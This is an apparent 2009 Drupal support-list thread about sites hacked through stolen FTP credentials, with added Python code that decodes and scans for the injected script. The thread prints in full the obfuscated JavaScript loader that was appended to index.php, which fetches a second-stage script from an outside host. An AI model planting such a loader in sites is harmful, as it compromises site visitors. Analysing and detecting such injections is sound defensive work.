Hello,
I've encountered a strange problem.
One of my sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
/*GNU GPL*/ try{window.onload = function(){
var G2kfrz1an5r = document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|!|\^|@|#/ig, ''));
var Bl136slxkfs = 'Y0p6c2vs6gca8';
G2kfrz1an5r.setAttribute('type', 't^!^^e#&x!$@t)(@/!)(j@#$@a@)v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|\)|#|\(|&|\$|!|\^/ig, ''));
G2kfrz1an5r.setAttribute('src', 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@&&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@#.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p$$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@)!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@(&@.$(!!u!#k^!@/)!!$'.replace(/@|\)|!|\(|\^|&|\$|#/ig, ''));
G2kfrz1an5r.setAttribute('defer', 'd(&e)f(^e!r('.replace(/#|\)|&|@|\(|!|\^|\$/ig, ''));
G2kfrz1an5r.setAttribute('id', 'S$##0@9^&&q$!^(t@b@$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/\$|#|\^|\(|&|@|\)|!/ig, ''));
document.body.appendChild(G2kfrz1an5r);
}} catch(Y2gjfbp30rk) {}
I have the impression this is encrypted JavaScript.
Is this site hacked? And if yes, is this due to Drupal or server-side?
Thank you
Steven
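The following Python script is an added worked example for this page, not code from the thread, from Drupal or from the blog linked later in it. It decodes the injected block quoted above statically, so none of the JavaScript is ever executed: every obfuscated literal in the payload has the shape '<payload mixed with noise>'.replace(/<noise characters separated by |>/ig, ''), so the script finds each such call, rebuilds the noise set from the regex alternation and strips those characters from the payload. The copy of the block embedded in the script writes the regex alternations with the backslashes an unescaped ')' needs in a JavaScript regex literal; the decoder accepts both the escaped and the bare form. The only output is the element the loader creates, its decoded attributes and the host the script tag would have fetched the second stage from.

```python
"""Static decoder for the "/*GNU GPL*/ try{window.onload ..." injection.

Every obfuscated literal in the payload looks like
    '<payload mixed with noise>'.replace(/<noise chars separated by |>/ig, '')
The noise set is recovered from the regex alternation and removed from the
payload in Python, so the JavaScript is never evaluated.
"""
import re
from urllib.parse import urlsplit

# The injected block as quoted in the original post. Regex metacharacters in
# the alternations are backslash-escaped here because an unescaped ')' is not
# a valid JavaScript regex; decode_literal() accepts either form.
INJECTED = (
    r"/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r = "
    r"document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|!|\^|@|#/ig, ''));"
    r"var Bl136slxkfs = 'Y0p6c2vs6gca8';"
    r"G2kfrz1an5r.setAttribute('type', 't^!^^e#&x!$@t)(@/!)(j@#$@a@)v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|\)|#|\(|&|\$|!|\^/ig, ''));"
    r"G2kfrz1an5r.setAttribute('src', 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@&&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@#.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p$$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@)!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@(&@.$(!!u!#k^!@/)!!$'.replace(/@|\)|!|\(|\^|&|\$|#/ig, ''));"
    r"G2kfrz1an5r.setAttribute('defer', 'd(&e)f(^e!r('.replace(/#|\)|&|@|\(|!|\^|\$/ig, ''));"
    r"G2kfrz1an5r.setAttribute('id', 'S$##0@9^&&q$!^(t@b@$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/\$|#|\^|\(|&|@|\)|!/ig, ''));"
    r"document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}"
)

# '<literal>'.replace(/<alternation>/ig, '')
CALL = re.compile(r"'([^']*)'\.replace\(/([^/]*)/ig,\s*''\)")
# document.createElement(<call>)  and  <var>.setAttribute('<name>', <call>)
ELEMENT = re.compile(r"createElement\(" + CALL.pattern + r"\)")
ATTRIBUTE = re.compile(r"setAttribute\('(\w+)',\s*" + CALL.pattern + r"\)")


def noise_chars(alternation):
    """'\\$|\\)|&' -> {'$', ')', '&'}; the bare form '$|)|&' gives the same set."""
    chars = set()
    for alt in alternation.split("|"):
        if alt.startswith("\\"):
            alt = alt[1:]
        if len(alt) != 1:
            raise ValueError("unexpected alternative %r" % alt)
        chars.add(alt)
    return chars


def decode_literal(payload, alternation):
    """Apply the .replace(/.../ig, '') step without running any JavaScript."""
    noise = noise_chars(alternation)
    return "".join(ch for ch in payload if ch not in noise)


def analyze(js):
    """Return the element the loader creates and its decoded attributes."""
    result = {"element": None, "attributes": {}}
    m = ELEMENT.search(js)
    if m:
        result["element"] = decode_literal(m.group(1), m.group(2))
    for name, payload, alternation in ATTRIBUTE.findall(js):
        result["attributes"][name] = decode_literal(payload, alternation)
    return result


def loader_host(js):
    """host[:port] of the decoded src, i.e. where the second stage is fetched from."""
    src = analyze(js)["attributes"].get("src")
    return urlsplit(src).netloc if src else None


if __name__ == "__main__":
    info = analyze(INJECTED)
    print("creates <%s> with attributes:" % info["element"])
    for name, value in info["attributes"].items():
        print("  %-6s %s" % (name, value))
    print("second stage fetched from:", loader_host(INJECTED))
```

The decoded src is the value to block at the proxy and to search for in the other sites' files. The variable names in the block look randomly generated and are not a good search key; the '.replace(/.../ig, '')' decoder with a long list of one-character alternatives is a far more stable thing to grep for.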
steven@vermoere.net wrote:
Ok. Change the password of the user that you use to connect to the server. If you are on hosting, contact your provider and report this hack. If you are on housing and you use ssh to connect to the server with the same user, your server could be compromised. Do a check.
M.
Hello,
Meanwhile, the password has been changed.
But I have a freakier issue:
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, lower-case letters). All Drupal versions are also different (one the most recent, another one 5, another one 6). I find it difficult to believe that all sites were hacked at the same time, with all different hosters in different locations.
Strange
-- Michel 'ZioBudda' Morelli michel@ziobuddalabs.net Development of Drupal CMS applications and dynamic web sites (LAMP+Ajax) Phone: 0200619074 Mobile: +39-3939890025 -- Fax: +39-0291390660
http://www.ziobudda.net ICQ: 58351764 http://www.ziobuddalabs.it Skype: zio_budda http://www.ziodrupal.net MSN: michel@ziobuddalabs.it JABBER: michel@ziobuddalabs.it
-- [ Drupal support list | http://lists.drupal.org/ ]
steven@vermoere.net wrote:
I checked the other websites that I have and they all have the same problem.
All ???
Are you sure that you don't have a zombie PC? A keylogger on your PC?
M.
Have you notified the hosting companies? They need to check other shared hosting accounts on the same servers as yours.
-- Ryan LeTulle
On Wed, Dec 30, 2009 at 8:08 AM, Michel Morelli michel@ziobuddalabs.it wrote:
Sounds like your PC has been compromised and someone has access to all FTP accounts stored there. I would run a very thorough check on your local machines for viruses and/or other unwanted nasties.
F
I'll check it ASAP, but I do not see anything special at this moment. I'll keep you informed.
Thanks
I googled some of the code and found this:
http://blog.bigg.net/2009/12/gnu-gpl-trywindow-onload-functionvar-trojan-fix/
----- Original Message ----- From: steven@vermoere.net To: support@drupal.org Sent: Wednesday, December 30, 2009 9:58:50 AM GMT -05:00 US/Canada Eastern Subject: Re: [support] Hacked or not
Meanwhile, I found the culprit:
On Monday, I had malware on my PC. Suddenly, while visiting a website (I do not remember which one anymore), my Java started running and I had malware on my PC. After 30 minutes, I managed to get it deleted from my PC, but the harm was done.
I was using FileZilla, and there the passwords are stored in a simple text file. This text file was sent to somewhere in Russia and then the sites were hacked with that information.
30 minutes is already enough to do this much harm. Shame on me, because my antivirus was complaining and I clicked Ignore instead of Heal...
Thanks everybody
Steven
_____
From: support-bounces@drupal.org [mailto:support-bounces@drupal.org] On Behalf Of patrick.bowe@comcast.net Sent: Wednesday 30 December 2009 16:15 To: support@drupal.org Subject: Re: [support] Hacked or not
See: My site was defaced ("hacked"). Now what? http://drupal.org/node/213320
If your index file has been modified then your site has been hacked, likely by a bot. Change that index file and revisit the file permissions for your Drupal code files. Ask your hosts if they have a back-up of your database and see if they are willing to work with you to identify when each account was compromised.
Cheers, Kieran Drupal security team coordinator
2009/12/30 steven steven@vermoere.net
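As an added check for the advice in this thread (example code written for this page, not Drupal's code and not the security team's), here is a small Python scanner that walks a site tree, flags every PHP or JS file carrying the two parts of this injection that do not vary between copies, and records each hit's modification time, which is what you line up against the host's FTP logs to see when the account was used, plus whether the file is group- or world-writable, for the permission review suggested above. The sample tree it builds is constructed for the demonstration, and the loader text it appends to the sample files is a shortened form of the one quoted at the top of the thread; the signature names and the suffix list are choices made for this example.

```python
"""Scan a Drupal (or any PHP) tree for the appended "/*GNU GPL*/" loader.

For every hit the scanner records the mtime (to line up with the host's FTP
logs) and whether the file is group/world writable (the permission review
suggested in the thread).
"""
import os
import re
import stat
import tempfile
from datetime import datetime, timezone

# The two parts of the payload that do not vary between copies: the opening
# comment + try{window.onload, and the '<junk>'.replace(/a|b|c|.../ig, '')
# decoder with many single-character alternatives. Variable names and the
# junk characters differ per copy, so they are not used as signatures.
SIGNATURES = (
    ("gnu-gpl-onload-loader",
     re.compile(r"/\*GNU GPL\*/\s*try\s*\{\s*window\.onload")),
    ("replace-noise-decoder",
     re.compile(r"\.replace\(/(?:\\?[^|/]\|){4,}\\?[^|/]/ig,\s*''\)")),
)
SCAN_SUFFIXES = (".php", ".inc", ".module", ".install", ".theme", ".js", ".html", ".htm")


def scan_file(path):
    """Names of the signatures present in one file; [] when it is clean."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_tree(root):
    """Walk root and return one finding per infected file, sorted by path."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):      # skip symlinks and specials
                continue
            hits = scan_file(path)
            if not hits:
                continue
            findings.append({
                "path": os.path.relpath(path, root),
                "signatures": hits,
                "mtime": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc).isoformat(timespec="seconds"),
                "writable_by_others": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
            })
    return sorted(findings, key=lambda f: f["path"])


# Shortened copy of the loader quoted in the thread, used only to build the
# sample tree below (constructed test data for this example).
LOADER = (r"/*GNU GPL*/ try{window.onload = function(){var a = document.createElement("
          r"'s&$c$@(#r!!i^$p^$t^$@'.replace(/\$|\)|\(|&|!|\^|@|#/ig, ''));"
          r"document.body.appendChild(a);}} catch(e) {}")


def build_sample_tree():
    """Constructed Drupal-like tree: two infected files, two clean ones."""
    root = tempfile.mkdtemp(prefix="drupal-scan-")
    files = {
        "index.php": "<?php\nrequire_once './includes/bootstrap.inc';\n"
                     "drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);\n"
                     "menu_execute_active_handler();\n?>\n" + LOADER + "\n",
        "update.php": "<?php\ndefine('MAINTENANCE_MODE', 'update');\n?>\n" + LOADER + "\n",
        # legitimate use of window.onload: must not be reported
        "misc/drupal.js": "window.onload = function () { Drupal.attachBehaviors(document); };\n",
        "sites/default/settings.php": "<?php\n$db_url = 'mysql://user:pass@localhost/db';\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.chmod(os.path.join(root, "update.php"), 0o666)   # deliberately world-writable
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["path"], f["mtime"], ",".join(f["signatures"]),
              "WRITABLE-BY-OTHERS" if f["writable_by_others"] else "")
```

Point scan_tree() at the webroot (or at a copy pulled down over SFTP) and compare the reported mtimes with the host's FTP log; a cluster of hits with the same timestamp, as in this thread, is the signature of credentials being replayed rather than of a Drupal bug. The second signature also catches copies whose leading comment has been changed, as long as the noise-stripping decoder is still in use.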